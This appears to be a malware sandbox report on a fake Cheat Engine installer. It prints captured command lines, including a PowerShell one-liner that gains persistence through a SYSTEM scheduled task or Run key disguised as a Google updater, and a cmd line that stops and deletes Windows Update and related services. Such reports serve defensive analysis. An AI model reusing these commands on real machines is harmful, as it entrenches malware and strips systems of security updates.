Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tugby#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B601587 cpuid

8_2_6B601587

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,	8_2_6B623ADF
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: EnumSystemLocalesW,	8_2_6B619A82
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: EnumSystemLocalesW,	8_2_6B623801
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_6B62388C
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,	8_2_6B619FEE
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,	8_2_6B623D0E
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_6B623DE4
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,	8_2_6B4D8C5F
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_6B623C08
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: EnumSystemLocalesW,	8_2_6B623766
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: EnumSystemLocalesW,	8_2_6B62371B
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetLocaleInfoW,	8_2_6B623674
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_6B62346F

Source: C:\Users\user\AppData\Local\Temp\v2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\v2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\logo.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WebAdvisor.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WeatherZero.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\RAV_Cross.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Queries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\finish.png VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
